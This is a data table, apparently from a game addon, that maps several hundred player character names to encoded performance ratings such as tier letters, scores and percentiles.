["Dontbunkme"] = "UT:358/46%EB:630/86%EM:838/89%",
["Heavenlight"] = "EB:620/87%LM:937/97%",
["Smallppman"] = "RB:299/66%EM:719/76%",
["Tortin"] = "UT:219/29%EB:688/88%RM:528/54%",
["Tardfarmer"] = "EB:613/81%EM:823/85%",
["Trëëhuggër"] = "LB:723/96%LM:874/96%",
["Hahayurded"] = "CB:45/4%UM:169/43%",
["Guoose"] = "UM:128/42%",
["Itzgrubhub"] = "UB:258/35%UM:232/31%",
["Kenergy"] = "UB:318/42%",
["Pullout"] = "EB:671/86%EM:923/93%",
["Nashgrom"] = "UB:246/33%UM:452/49%",
["Rutoairlines"] = "EM:731/76%",
["Dupey"] = "CM:43/15%",
["Everyn"] = "EB:722/91%EM:869/89%",
["Tiddiefister"] = "EB:651/84%EM:901/92%",
["Solomonwise"] = "ET:730/93%EB:541/90%LM:955/97%",
["Justehtip"] = "RT:142/50%EB:593/78%RM:672/71%",
["Vynson"] = "UT:224/30%RB:410/56%RM:685/71%",
["Kangis"] = "UT:80/36%CB:31/1%",
["Daxjias"] = "RT:132/55%EB:612/78%RM:684/73%",
["Dovlyn"] = "UB:228/29%UM:142/39%",
["Maim"] = "ET:189/85%EB:535/86%RM:240/73%",
["Ahgiel"] = "RB:365/51%EM:720/78%",
["Mackayla"] = "CM:29/11%",
["Jespet"] = "EB:621/85%EM:891/93%",
["Ahkoru"] = "UB:356/49%EM:829/86%",
["Angelluz"] = "RT:160/58%RB:511/65%EM:707/75%",
["Froju"] = "RT:400/54%LB:766/96%LM:959/97%",
["Raedeonn"] = "CM:31/11%",
["Astromage"] = "EB:627/86%LM:697/95%",
["Chilledtouch"] = "RM:279/69%",
["Arahant"] = "RM:176/54%",
["Oaksage"] = "RB:237/58%EM:674/84%",
["Liljazz"] = "CM:32/8%",
["Ilfeen"] = "UT:311/42%EB:366/75%EM:718/77%",
["Chloelamb"] = "CM:77/12%",
["Rosenim"] = "UM:85/33%",
["Poohpie"] = "CM:49/3%",
["Boosties"] = "CT:84/7%CB:38/1%RM:559/61%",
["Astamarosa"] = "EB:336/76%RM:564/62%",
["Sevoso"] = "RB:514/68%RM:584/69%",
["Iackluster"] = "RT:380/50%UM:260/32%",
["Closertome"] = "UM:138/38%",
["Slumper"] = "EM:685/79%",
["Spacecommand"] = "RM:180/54%",
["Aveilade"] = "CM:25/0%",
["Dispence"] = "RB:466/62%EM:485/86%",
["Vickygogo"] = "RB:433/59%EM:703/77%",
["Rourou"] = "UB:361/46%UM:469/48%",
["Sktfaker"] = "EB:555/77%EM:828/86%",
["Rivendell"] = "RB:478/66%RM:624/69%",
["Misakamikoto"] = "EB:616/84%EM:829/88%",
["Niub"] = "EB:576/75%EM:916/93%",
["Therips"] = "CB:86/8%RM:324/68%",
["Alagash"] = "RM:168/52%",
["Dabitko"] = "CM:51/6%",
["Tubberino"] = "RM:276/55%",
["Moodcoffee"] = "CB:14/1%UM:143/44%",
["Salinara"] = "CB:50/5%",
["Chachsky"] = "UB:193/40%",
["Anastyzia"] = "RT:245/74%RB:326/68%EM:422/76%",
["Fauxahontas"] = "LT:745/95%LB:772/97%LM:953/96%",
["Youannoyme"] = "UM:407/48%",
["Coincidance"] = "RT:423/55%EB:683/92%EM:855/91%",
["Lancelots"] = "RT:143/53%RB:431/60%RM:519/58%",
["Slytitan"] = "RM:527/59%",
["Rhyguy"] = "CM:25/5%",
["Kolban"] = "CM:31/9%",
["Thraenite"] = "UB:336/43%UM:305/36%",
["Mariahcarry"] = "EB:682/92%EM:824/88%",
["Agranularleu"] = "CB:102/10%UM:464/49%",
["Kenderonnik"] = "UT:99/45%UM:145/48%",
["Nigella"] = "CM:155/14%",
["Bakayaro"] = "UT:73/27%RM:450/54%",
["Kabull"] = "CT:50/10%UB:303/38%RM:717/66%",
["Clishon"] = "CT:65/7%EB:405/84%EM:421/82%",
["Ezsimon"] = "UT:113/43%RB:470/63%EM:892/92%",
["Wninenine"] = "CB:52/13%UM:114/36%",
["Xxoxxo"] = "CT:143/23%EB:608/79%EM:403/76%",
["Farmersmokey"] = "RM:512/54%",
["Icyprincess"] = "CB:140/18%RM:453/53%",
["Hektorv"] = "CM:197/22%",
["Dyldoee"] = "CB:95/12%RM:254/65%",
["Zomgief"] = "CB:64/15%CM:172/22%",
["Frostcamz"] = "CM:66/9%",
["Ohbilly"] = "CB:56/5%CM:30/2%",
["Amau"] = "ET:304/81%RB:413/59%RM:574/64%",
["Ged"] = "CM:78/11%",
["Béns"] = "EB:698/89%EM:865/89%",
["Reignßlood"] = "RM:424/50%",
["Frostyshot"] = "CM:18/5%",
["Dhunters"] = "RB:417/55%RM:547/60%",
["Joint"] = "UB:369/47%UM:373/43%",
["Alopecia"] = "CT:200/23%EB:690/92%LM:922/96%",
["Yoouwhoo"] = "CB:72/6%RM:544/59%",
["Deathchaser"] = "UM:76/27%",
["Workhorse"] = "CB:36/5%EM:669/76%",
["Tharnatos"] = "CT:70/8%EB:717/91%EM:812/84%",
["Pluvio"] = "CM:143/16%",
["Danl"] = "CB:181/24%UM:382/39%",
["Flamerat"] = "RT:159/58%EB:709/91%EM:887/92%",
["Weginald"] = "RM:648/69%",
["Froya"] = "RM:216/60%",
["Girthymike"] = "CM:17/3%",
["Lemonlime"] = "ET:594/90%LB:774/98%SM:984/99%",
["Cafeine"] = "UM:92/35%",
["Smashmouth"] = "CB:50/5%UM:89/34%",
["Someonedead"] = "CT:94/16%UB:359/49%UM:155/49%",
["Dataglitch"] = "UB:324/42%EM:426/83%",
["Mingshii"] = "RT:380/53%UB:161/38%RM:135/58%",
["Ordwald"] = "CT:183/24%CB:145/19%CM:34/14%",
["Dreamermemer"] = "CB:212/22%UM:75/40%",
["Cloakndaggr"] = "UB:340/45%RM:538/60%",
["Ryaq"] = "RB:481/64%RM:661/72%",
["Dilan"] = "CM:39/13%",
["Babydwarf"] = "EM:686/79%",
["Blisterz"] = "UT:340/44%LB:786/98%SM:1037/99%",
["Odael"] = "RM:428/50%",
["Joeywerkz"] = "RM:612/69%",
["Xhalph"] = "CT:134/17%CB:95/10%CM:120/19%",
["Saluda"] = "CB:60/6%RM:520/58%",
["Ehif"] = "EB:661/89%EM:685/84%",
["Creepy"] = "RM:631/69%",
["Skarecrow"] = "RT:186/66%RB:411/56%RM:250/60%",
["Slix"] = "CM:74/9%",
["Whitemaneluc"] = "UM:88/31%",
["Gbu"] = "UB:255/32%EM:740/78%",
["Allimydog"] = "CM:16/7%",
["Dipandot"] = "CB:62/7%CM:28/11%",
["Cowabungaa"] = "RM:622/66%",
["Taallon"] = "UM:135/42%",
["Littleamber"] = "UT:320/42%EB:715/91%EM:863/89%",
["Bugattii"] = "EB:577/76%EM:772/83%",
["Phaed"] = "RB:419/55%EM:740/75%",
["Idfap"] = "UT:270/35%RB:380/50%LM:961/97%",
["Icepops"] = "UT:281/36%UB:205/27%RM:484/60%",
["Sowrddemon"] = "CB:26/0%",
["Cocyto"] = "UT:107/48%EB:676/87%EM:753/81%",
["Chromier"] = "CM:181/24%",
["Hitch"] = "ET:374/93%LB:755/96%LM:923/96%",
["Madness"] = "RM:206/52%",
["Whïtegïrl"] = "UT:91/36%RB:394/53%RM:305/67%",
["Anzela"] = "RT:157/64%RB:488/65%EM:377/79%",
["Goldfarmcom"] = "UB:281/38%UM:129/44%",
["Saranna"] = "UB:224/28%RM:582/64%",
["Orangetea"] = "CB:87/10%RM:523/55%",
["Henrald"] = "UB:279/36%RM:485/54%",
["Gokomo"] = "EB:684/88%EM:843/89%",
["Zzboss"] = "EB:673/85%RM:640/68%",
["Ddnk"] = "UM:198/25%",
["Elcruel"] = "RM:459/50%",
["Nonessential"] = "RB:464/64%RM:500/55%",
["Belthuzad"] = "EB:632/82%RM:660/69%",
["Yabal"] = "UB:356/48%RM:632/69%",
["Chijier"] = "UM:227/27%",
["Xf"] = "UM:273/28%",
["Whatspet"] = "CB:35/2%RM:473/53%",
["Heavyfire"] = "UB:360/49%RM:478/56%",
["Connery"] = "UB:197/26%RM:296/64%",
["Artyxd"] = "EB:419/79%UM:141/44%",
["Zewo"] = "CB:148/15%CM:162/20%",
["Codybangers"] = "UM:368/44%",
["Ratbasturd"] = "EB:746/94%EM:862/88%",
["Sanctumm"] = "EM:880/93%",
["Whatsap"] = "CB:79/9%UM:375/43%",
["Vvy"] = "UM:421/49%",
["Seankk"] = "RM:255/65%",
["Moistiez"] = "CB:111/12%CM:161/24%",
["Avellira"] = "CB:54/12%UM:292/33%",
["Jabungo"] = "ET:603/80%EB:700/93%RM:460/54%",
["Xiaoran"] = "CM:50/17%",
["Roupoo"] = "RB:461/66%UM:240/28%",
["Podjgfj"] = "RT:389/56%RB:307/71%RM:440/52%",
["Allkill"] = "CT:55/18%UB:299/39%RM:509/57%",
["Joyz"] = "RB:509/70%RM:563/62%",
["Lightsummer"] = "UM:73/28%",
["Glowstick"] = "CM:165/23%",
["Lootvac"] = "RB:539/71%RM:557/59%",
["Lisaxlisa"] = "LB:779/97%LM:984/98%",
["Croown"] = "RT:166/67%UB:108/30%UM:116/41%",
["Gnomoremana"] = "CB:65/17%RM:474/56%",
["Windspeaker"] = "RM:653/71%",
["Abbathor"] = "RB:494/63%EM:823/85%",
["Pvpp"] = "EB:747/94%LM:937/95%",
["Foxa"] = "EB:692/87%EM:912/93%",
["Stabbytammy"] = "UB:268/32%RM:274/59%",
["Akuto"] = "UB:235/28%CM:97/9%",
["Zeniba"] = "UT:237/29%RB:405/56%EM:798/85%",
["Banginsheep"] = "UM:81/32%",
["Posillon"] = "CM:32/2%",
["Pvppatt"] = "UB:222/27%RM:511/56%",
["Alvaa"] = "RB:319/73%UM:405/43%",
["Economi"] = "UM:275/28%",
["Purplehazu"] = "UT:71/27%EB:483/87%EM:786/82%",
["Economee"] = "CM:27/0%",
["Nurul"] = "CB:73/20%RM:444/52%",
["Vivvy"] = "UB:360/49%UM:469/49%",
["Stormalong"] = "RB:423/55%RM:563/60%",
["Melisandre"] = "RM:502/56%",
["Zairos"] = "RB:402/56%RM:173/53%",
["Sarthalas"] = "RT:86/61%RB:220/72%EM:602/83%",
["Dipdug"] = "CM:36/3%",
["Foodplz"] = "UM:421/45%",
["Dirtyhos"] = "EB:688/92%EM:690/75%",
["Cardyß"] = "RB:535/70%RM:530/54%",
["Tuskz"] = "RM:595/69%",
["Maxhamstring"] = "CT:107/18%RB:274/61%EM:728/77%",
["Cheddabob"] = "RB:427/58%RM:559/58%",
["Frotting"] = "EM:684/76%",
["Flipstrips"] = "RB:375/52%RM:653/72%",
["Wildarms"] = "CM:40/5%",
["Ajsenpai"] = "CM:48/17%",
["Wankdalf"] = "UB:132/36%CM:73/10%",
["Fpee"] = "UM:78/28%",
["Rms"] = "UM:124/39%",
["Ilovesm"] = "RM:547/61%",
["Taskase"] = "EB:581/77%EM:761/82%",
["Ilegend"] = "RB:244/61%RM:179/54%",
["Mkhammer"] = "CM:24/8%",
["Kiesza"] = "RB:218/56%RM:445/52%",
["Hamuelhuh"] = "EB:673/86%EM:825/87%",
["Cromulon"] = "CB:152/17%RM:616/68%",
["Visigots"] = "UM:87/31%",
["Bellamorte"] = "UT:67/25%LB:748/95%EM:885/92%",
["Iúwùl"] = "ET:452/94%LB:646/96%EM:861/89%",
["Fluffynutter"] = "ET:458/94%EB:707/94%EM:901/94%",
["Spiceknight"] = "LT:591/98%EB:750/94%LM:944/95%",
["Xlarge"] = "UB:118/30%EM:746/81%",
["Tectonicedge"] = "CT:33/8%RB:420/51%EM:495/76%",
["Plusultra"] = "RB:500/63%RM:597/67%",
["Beeowin"] = "UT:103/32%CM:82/8%",
["Melissandraa"] = "UM:113/40%",
["Ssnoww"] = "UM:126/38%",
["Rustin"] = "CM:69/23%",
["Hellfreak"] = "RB:368/51%RM:630/69%",
["Chokychoky"] = "CM:121/17%",
["Naeedas"] = "CT:108/13%UB:284/38%UM:167/48%",
["Menaçe"] = "CM:46/15%",
["Lhythj"] = "UB:96/46%UM:185/45%",
["Divyani"] = "CM:50/18%",
["Friendzoned"] = "CB:76/7%CM:244/24%",
["Soulgluttony"] = "CT:8/3%UM:157/45%",
["Ootss"] = "CB:126/15%",
["Vlis"] = "RM:341/69%",
["Roachclíp"] = "EB:588/77%CM:110/14%",
["Motors"] = "UM:320/38%",
["Sayfullah"] = "CM:108/14%",
["Lildave"] = "RM:635/66%",
["Dgamers"] = "RB:541/73%RM:607/67%",
["Urapedalfile"] = "UM:363/41%",
["Qquartz"] = "CT:38/4%UB:375/49%UM:91/34%",
["Dwarfpreest"] = "CT:104/11%RB:522/72%EM:573/88%",
["Nusk"] = "CM:31/2%",
["Wuzi"] = "RB:444/62%RM:498/54%",
["Smunt"] = "CB:75/9%",
["Arthamus"] = "CM:130/18%",
["Holyhackjack"] = "LB:754/95%EM:868/89%",
["Thelegman"] = "UM:378/38%",
["Bunkleehimer"] = "CT:46/19%UB:159/38%UM:434/45%",
["Onyxa"] = "UM:104/38%",
["Pont"] = "CT:27/11%CB:28/3%UM:351/46%",
["Klavinester"] = "RM:342/62%",
["Ratgodx"] = "CT:93/9%RB:522/72%EM:791/86%",
["Kasemo"] = "EB:706/89%EM:763/80%",
["Buttercuplol"] = "CB:41/3%CM:29/14%",
["Huntare"] = "CT:0/3%CB:163/20%UM:357/40%",
["Magestank"] = "CT:0/2%EB:612/80%RM:647/71%",
["Squirtlebugs"] = "ET:707/86%EB:652/89%RM:380/74%",
["Ls"] = "EB:537/75%EM:706/78%",
["Shuz"] = "LT:651/98%EB:431/81%EM:621/89%",
["Shadoouken"] = "EM:567/77%",
["Greenroots"] = "CB:178/22%RM:530/54%",
["Darrenbi"] = "UB:310/41%UM:75/27%",
["Triplebeam"] = "UM:225/28%",
["Smokn"] = "UT:77/30%RB:402/53%EM:723/78%",
["Lovesme"] = "CB:62/6%UM:349/37%",
["Hamsterwater"] = "CT:0/1%RB:386/51%RM:582/64%",
["Bloodrose"] = "UB:345/43%RM:477/51%",
["Boofius"] = "RT:130/55%EB:657/89%EM:765/88%",
["Deathclassic"] = "ET:267/78%EB:604/78%EM:758/79%",
["Poonjabi"] = "UT:308/38%RB:491/71%EM:675/78%",
["Grundis"] = "RT:202/73%RB:522/66%RM:379/68%",
["Anin"] = "UM:237/28%",
["Pish"] = "RT:162/50%RB:406/55%EM:753/82%",
["Nillaice"] = "UM:143/47%",
["Escqt"] = "RT:480/66%RM:697/74%",
["Gartred"] = "UT:126/47%RB:429/60%EM:583/91%",
["Zzg"] = "RB:418/57%RM:608/65%",
["Mïlky"] = "CM:43/14%",
["Ezyoon"] = "UM:49/41%",
["Sneakypeakyl"] = "RB:472/60%UM:370/38%",
["Ezshow"] = "CT:66/12%UB:311/37%RM:439/50%",
["Ellihs"] = "UT:47/47%EB:704/93%LM:928/96%",
["Callmedaddys"] = "CT:82/10%CB:112/14%",
["Sulfate"] = "EM:885/90%",
["Falkkón"] = "RB:430/71%EM:714/85%",
["Unhunh"] = "CT:11/1%CB:172/20%RM:556/62%",
["Dazzil"] = "LT:386/95%EB:612/88%EM:681/84%",
["Oogs"] = "RT:141/53%UB:348/44%UM:402/41%",
["Jane"] = "RB:527/70%EM:832/88%",
["Banduri"] = "EB:520/85%",
["Denzillum"] = "CB:31/4%UM:234/29%",
["Weretiger"] = "CB:37/6%RM:535/59%",
["Hightimee"] = "RM:556/64%",
["Dotpdf"] = "LM:877/95%",
["Thotydots"] = "EB:393/77%UM:385/39%",
["Lesca"] = "EB:700/88%EM:834/87%",
["Angryfists"] = "CM:36/1%",
["Bomfit"] = "EB:607/77%EM:863/88%",
["Zyabayna"] = "CB:35/3%CM:150/14%",
["Elwun"] = "RB:551/73%LM:973/97%",
["Bruroc"] = "RM:683/72%",
["Pyroko"] = "RB:483/69%RM:221/61%",
["Skeletank"] = "RB:315/56%UM:267/48%",
["Infernalwind"] = "RB:428/55%RM:591/61%",
["Summonn"] = "UB:254/34%UM:276/33%",
["Hewpty"] = "CB:81/22%UM:360/41%",
["Evilchacha"] = "UT:221/42%RB:224/62%RM:328/55%",
["Infuseqt"] = "RT:529/70%EB:748/94%EM:920/94%",
["Bigcritzz"] = "CM:25/0%",
["Phavi"] = "RB:527/74%EM:840/85%",
["Ponto"] = "UB:337/46%EM:693/76%",
["Slidinout"] = "RM:251/60%",
["Wildroot"] = "RT:116/67%RB:218/65%",
["Chillmonger"] = "UB:302/42%UM:226/32%",
["Rileyraid"] = "EB:596/78%CM:62/8%",
["Silkysunders"] = "UB:333/38%RM:376/60%",
["Sosiq"] = "CM:2/2%",
["Flowjoe"] = "UM:81/29%",
["Apocalypz"] = "EB:706/89%EM:793/83%",
["Cheenke"] = "ET:730/93%UB:211/27%UM:425/46%",
["Gorillaz"] = "CB:59/11%",
["Skydz"] = "CT:47/15%UB:307/37%UM:444/47%",
["Gloomstrider"] = "CB:37/3%",
["Kionz"] = "CT:158/17%UB:321/43%UM:275/32%",
["Tarachand"] = "CT:127/20%RB:341/71%RM:571/61%",
["Anorith"] = "RB:231/54%RM:546/59%",
["Fiveblue"] = "UT:200/26%EB:580/76%EM:743/78%",
["Beelei"] = "EB:443/87%RM:522/57%",
["Doremi"] = "CT:132/17%EB:413/79%RM:371/72%",
["Tobí"] = "CB:34/5%",
["Royalflush"] = "ET:656/86%EB:747/94%EM:921/94%",
["Mälfurion"] = "RT:129/56%EB:630/91%EM:651/85%",
["Bruvv"] = "UB:157/42%UM:133/45%",
["Tiandrad"] = "RT:174/62%RB:491/65%RM:557/59%",
["Chaq"] = "CB:75/19%EM:724/78%",
["Reth"] = "RM:593/65%",
["Elhuevo"] = "EB:597/79%EM:692/75%",
["Harrysacks"] = "RB:419/70%EM:671/82%",
["Menson"] = "RB:360/51%EM:717/78%",
["Womble"] = "CB:42/3%RM:527/58%",
["Telyri"] = "RB:524/73%EM:732/83%",
["Veryezclass"] = "RB:432/60%RM:639/74%",
["Keepjonesn"] = "UT:201/26%EB:743/94%LM:963/97%",
["Toomuchsos"] = "RT:123/52%RB:505/74%EM:643/81%",
["Critbit"] = "UT:68/25%RB:457/62%RM:506/56%",
["Bikuchan"] = "RB:322/69%",
["Ziafox"] = "UB:224/25%CM:117/15%",
["Violetpolish"] = "RT:94/63%RB:241/67%RM:266/59%",
["Apokavkos"] = "CB:191/23%UM:252/30%",
["Translucent"] = "CB:34/3%RM:527/56%",
["Betty"] = "RM:267/58%",
["Travismane"] = "ET:248/76%EB:571/92%EM:910/92%",
["Bigsmokedog"] = "RT:458/62%EB:723/91%EM:926/92%",
["Pittman"] = "RT:365/50%RB:290/63%RM:570/64%",
["Cincinnasti"] = "UT:277/39%RB:569/72%EM:840/87%",
["Eoden"] = "CT:58/11%UB:289/34%",
["Cardina"] = "RB:490/68%EM:734/77%",
["Creepio"] = "RT:119/52%EB:534/76%EM:633/76%",
["Panchorcvila"] = "EB:375/76%RM:583/64%",
["Ripvanwinkle"] = "CB:84/10%RM:450/50%",
["Promethazine"] = "UB:103/28%UM:355/41%",
["Lifetapok"] = "EB:702/89%EM:718/75%",
["Jackeline"] = "UB:317/43%CM:96/14%",
["Cavendrethy"] = "CB:3/0%UM:88/33%",
["Psydo"] = "CM:41/16%",
["Raccoontime"] = "RM:277/64%",
["Scythé"] = "UM:84/32%",
["Kuangbaozhan"] = "CT:7/8%UB:393/47%EM:877/90%",
["Redns"] = "UT:248/32%UB:197/48%UM:86/30%",
["Chitolung"] = "ET:644/85%EB:717/91%LM:919/95%",
["Philips"] = "CT:35/3%EB:684/87%EM:845/87%",
["Hxiapriest"] = "CM:45/11%",
["Hurryzz"] = "CB:28/2%CM:95/14%",
["Freeballan"] = "RB:549/70%RM:705/74%",
["Laonanren"] = "EB:556/79%RM:365/73%",
["Emotíons"] = "EB:600/78%EM:915/92%",
["Wasps"] = "EB:381/76%RM:477/74%",
["Littlelouis"] = "EB:633/82%EM:807/84%",
["Thatsthedyr"] = "RM:485/51%",
["Kampret"] = "RB:310/67%UM:120/38%",
["Lumbermill"] = "UB:336/45%EM:769/75%",
["Jochy"] = "UB:220/28%RM:645/71%",
["Orangejuice"] = "ET:709/91%EB:421/80%EM:835/82%",
["Stayz"] = "ET:614/81%RB:478/64%EM:744/80%",
["Schoop"] = "CB:18/21%CM:6/9%",
["Omizu"] = "RB:456/64%EM:730/79%",
["Omargsx"] = "UT:103/40%EM:786/88%",
["Falarian"] = "UM:356/41%",
["Zombieslayer"] = "RB:498/65%UM:178/49%",
["Archyguy"] = "UM:402/47%",
["Sarason"] = "UM:104/32%",
["Stec"] = "CM:26/10%",
["Lumpyhaggins"] = "EB:649/85%EM:820/87%",
["Eboz"] = "UM:83/31%",
["Maur"] = "CT:160/20%RB:534/71%RM:572/63%",
["Hazzmatica"] = "UM:265/26%",
["Mabubsanim"] = "CM:122/11%",
["Erom"] = "UT:69/28%RB:432/53%EM:676/86%",
["Tankful"] = "EB:550/79%EM:608/79%",
["Bap"] = "EB:730/92%EM:861/90%",
["Ugk"] = "EM:875/87%",
["Domehunter"] = "UT:119/46%EB:748/94%EM:862/89%",
["Choni"] = "UM:160/41%",
["Velkoz"] = "CT:42/4%CM:66/23%",
["Delicieuse"] = "CB:91/10%RM:476/54%",
["Miníhulk"] = "RB:212/54%EM:772/87%",
["Greyleaf"] = "RB:193/50%UM:404/43%",
["Pwncake"] = "RT:216/69%EB:609/80%RM:715/74%",
["Moankin"] = "RM:217/58%",
["Spacetrip"] = "CT:38/12%CB:23/1%CM:134/19%",
["Wolverino"] = "CT:8/8%CB:119/13%UM:288/33%",
["Outty"] = "RB:476/61%EM:712/75%",
["Meiguiya"] = "UM:202/26%",
["Baintoko"] = "CT:58/21%RB:428/59%RM:679/73%",
["Catduded"] = "RM:558/53%",
["Prilly"] = "CM:30/1%",
["Phyrefest"] = "RB:195/51%RM:441/52%",
["Adresi"] = "RM:576/65%",
["Iiliiliiliil"] = "UT:76/29%RB:385/50%RM:354/72%",
["Nemé"] = "EB:730/92%EM:908/92%",
["Oledude"] = "RM:552/58%",
["Feralgrace"] = "ET:318/87%RM:684/73%",
["Holliday"] = "UT:286/38%EB:729/92%EM:888/91%",
["Yiuyiui"] = "CB:35/3%UM:281/28%",
["Volupto"] = "CM:14/1%",
["Seethoz"] = "UB:226/30%UM:96/33%",
["Alligator"] = "UM:288/34%",
["Kryotik"] = "EM:743/80%",
["Phylo"] = "RB:416/51%EM:723/77%",
["Burnkit"] = "RT:186/66%RB:531/72%EM:579/88%",
["Badadoom"] = "CT:34/9%UB:330/44%RM:354/70%",
["Cyndrela"] = "RT:156/57%EB:685/87%EM:455/80%",
["Amily"] = "UM:293/34%",
["Blinker"] = "CB:45/3%RM:448/53%",
["Niquil"] = "UM:170/43%",
["Bacala"] = "RT:138/68%LB:717/96%LM:960/98%",
["Seronaught"] = "RT:467/73%EB:688/91%EM:827/91%",
["Mac"] = "RM:645/61%",
["Diinbob"] = "UT:82/38%EB:642/92%LM:750/96%",
["Hosi"] = "CT:0/0%CB:28/2%CM:54/19%",
["Tingj"] = "UB:271/31%RM:463/73%",
["Ensoul"] = "UT:163/34%RB:272/51%RM:249/55%",
["Leafmc"] = "EB:560/78%EM:823/87%",
["Silentw"] = "RT:139/57%EB:539/80%EM:741/87%",
["Bambun"] = "CT:162/21%EB:633/82%RM:657/68%",
["Fettywap"] = "CB:179/19%UM:157/44%",
["Rybin"] = "RB:200/50%UM:330/40%",
["Tingbaobao"] = "CM:162/22%",
["Dirtyman"] = "RB:484/66%RM:528/59%",
["Sodalime"] = "UM:288/34%",
["Liuli"] = "CM:146/20%",
["Rookle"] = "RB:429/60%UM:447/48%",
["Shatter"] = "CM:60/8%",
["Gnosurvivors"] = "RM:236/63%",
["Soppressata"] = "ET:685/89%LB:797/98%SM:1005/99%",
["Boomersummon"] = "EB:653/84%EM:721/75%",
["Spikedoggy"] = "ET:209/87%EB:569/88%EM:817/93%",
["Drogonn"] = "CB:65/8%RM:521/57%",
["Hellblood"] = "RT:405/53%EB:726/92%EM:916/94%",
["Rawtid"] = "RM:649/72%",
["Ticklefight"] = "CM:2/0%",
["Waylon"] = "CB:137/14%UM:210/25%",
["Xiangoung"] = "CM:75/9%",
["Chappers"] = "RB:513/66%RM:698/74%",
["Freyat"] = "ET:425/94%EB:599/93%EM:847/87%",
["Mavan"] = "RT:528/72%LB:763/96%LM:934/95%",
["Eason"] = "CT:46/16%EB:591/77%EM:893/91%",
["Bwarrior"] = "UB:238/46%RM:502/71%",
["Wednesdåy"] = "UB:112/48%CM:27/10%",
["Öb"] = "UT:78/28%EB:733/93%EM:766/80%",
["Tranqshotlol"] = "UT:117/45%CB:144/18%RM:545/60%",
["Cutieboys"] = "CT:36/15%CM:107/15%",
["Daijoubu"] = "RT:395/52%EB:689/88%RM:537/55%",
["Destroyhorde"] = "CM:48/6%",
["Algid"] = "EB:659/86%UM:375/40%",
["Santababy"] = "CB:26/0%",
["Putatumadre"] = "CM:27/0%",
["Damonic"] = "UB:299/37%RM:548/56%",
["Writhen"] = "UB:187/46%UM:435/48%",
["Durotanhell"] = "UB:349/40%RM:197/51%",
["Khagas"] = "UT:124/47%EB:747/94%EM:851/89%",
["Hotsake"] = "UT:85/34%RB:468/59%RM:682/73%",
["Bomshacalaka"] = "CT:12/8%CB:63/6%LM:930/95%",
["Trazo"] = "CT:63/17%CB:50/10%CM:74/8%",
["Lexuses"] = "EB:590/75%EM:859/88%",
["Atriox"] = "CM:35/4%",
["Neggo"] = "CM:59/8%",
["Arkanine"] = "CM:47/5%",
["Huameinan"] = "EB:701/89%EM:798/83%",
["Banercun"] = "RT:379/62%EB:690/91%EM:718/85%",
["Peypeypey"] = "EB:716/93%EM:838/92%",
["Dankhealzz"] = "CT:56/4%RB:305/59%UM:96/41%",
["Malytiae"] = "UM:75/28%",
["Diacono"] = "CM:56/20%",
["Geminate"] = "CB:155/18%RM:608/65%",
["Orcasms"] = "RT:472/73%EB:719/93%EM:892/94%",
["Dîgz"] = "RM:331/74%",
["Khandalf"] = "CB:27/3%UM:124/39%",
["Bigbbq"] = "RT:142/52%RB:419/55%RM:611/67%",
["Devils"] = "UM:132/36%",
["Revert"] = "CT:83/10%EB:492/86%EM:783/81%",
["Icephoenix"] = "UM:71/27%",
["Joaquins"] = "CB:50/5%CM:68/22%",
["Aartemis"] = "CB:58/6%EM:708/75%",
["Elprospector"] = "CT:27/1%CM:45/14%",
["Ickis"] = "CM:3/0%",
["Mochfjrii"] = "CM:14/3%",
["Squirtleluck"] = "RT:473/63%EB:723/91%EM:894/92%",
["Notfrostmage"] = "RT:530/71%LB:630/97%LM:941/96%",
["Penguins"] = "RM:581/68%",
["Carolinee"] = "CT:44/15%UB:324/43%UM:340/38%",
["Queuety"] = "EB:621/86%EM:832/90%",
["Notmykel"] = "EB:708/91%EM:882/92%",
["Octopussi"] = "UT:269/34%EB:627/80%EM:714/75%",
["Fearxd"] = "RB:257/58%RM:511/56%",
["Enic"] = "RB:387/53%RM:267/67%",
["Lilsnowie"] = "ET:547/80%EB:638/88%EM:700/84%",
["Rathole"] = "CB:61/4%CM:96/10%",
["Bluntstub"] = "RM:194/52%",
["Rekaronie"] = "RB:478/64%EM:774/82%",
["Lekro"] = "UM:322/33%",
["Dont"] = "EB:580/92%EM:919/94%",
["Trickx"] = "RB:387/51%RM:535/59%",
["Minicouette"] = "CM:61/4%",
["Gladyspiper"] = "RM:649/69%",
["Heartfirst"] = "RB:485/67%RM:631/69%",
["Xenophun"] = "UM:440/48%",
["Shikarie"] = "RM:533/57%",
["Ámplify"] = "UB:77/28%RM:618/69%",
["Xenzo"] = "RB:451/68%EM:583/77%",
["Ludwik"] = "UM:253/30%",
["Sodaberry"] = "RM:440/52%",
["Spigel"] = "EB:519/78%EM:656/84%",
["Blaze"] = "CM:182/24%",
["Daley"] = "UB:241/28%RM:421/64%",
["Boggyman"] = "UB:302/40%UM:304/35%",
["Justionay"] = "CM:81/11%",
["Slightlysick"] = "RT:181/64%RB:540/72%EM:686/75%",
["Yogibearz"] = "UM:115/35%",
["Moonstalk"] = "CT:41/4%UB:259/32%UM:396/44%",
["Durpa"] = "UB:189/45%UM:389/44%",
["Futuresdruid"] = "EM:561/79%",
["Drowsell"] = "RT:437/60%EB:722/91%EM:902/92%",
["Primalgreed"] = "CB:90/9%RM:364/68%",
["Spaceghost"] = "UB:222/27%RM:600/64%",
["Lauer"] = "CM:85/12%",
["Likmynut"] = "CM:56/7%",
["Shmehgoats"] = "CM:183/21%",
["Âlphâ"] = "RB:298/65%UM:93/28%",
["Satsunter"] = "UM:275/26%",
["Compaverga"] = "UB:360/46%RM:522/55%",
["Flash"] = "CT:16/3%UM:416/47%",
["Numerocinco"] = "UM:194/25%",
["Ailo"] = "CM:110/15%",
["Ghostrage"] = "CB:134/15%UM:245/30%",
["Dispose"] = "UM:361/41%",
["Xaxis"] = "CM:157/20%",
["Jbags"] = "RT:410/58%EB:639/83%RM:559/59%",
["Nocksanne"] = "UM:354/37%",
["Getgud"] = "UM:309/30%",
["Rishak"] = "ET:296/87%EB:559/92%EM:518/84%",
["Mudblud"] = "EM:629/92%",
["Ilikemuscle"] = "CB:37/8%UM:114/39%",
["Incisionz"] = "RT:226/73%EB:465/85%EM:880/90%",
["Hydrate"] = "EB:605/83%EM:867/93%",
["Pokymon"] = "UB:386/48%RM:693/73%",
["Meowzz"] = "CM:90/11%",
["Uriah"] = "UB:103/28%UM:435/44%",
["Shalomi"] = "CB:26/0%RM:498/54%",
["Kakari"] = "CT:62/24%UB:344/45%RM:693/74%",
["Ezeepz"] = "RT:161/56%CB:69/16%UM:275/32%",
["Sevensin"] = "EB:728/94%LM:922/96%",
["Goodaa"] = "RM:557/66%",
["Misstree"] = "UT:219/32%LB:524/95%EM:816/93%",
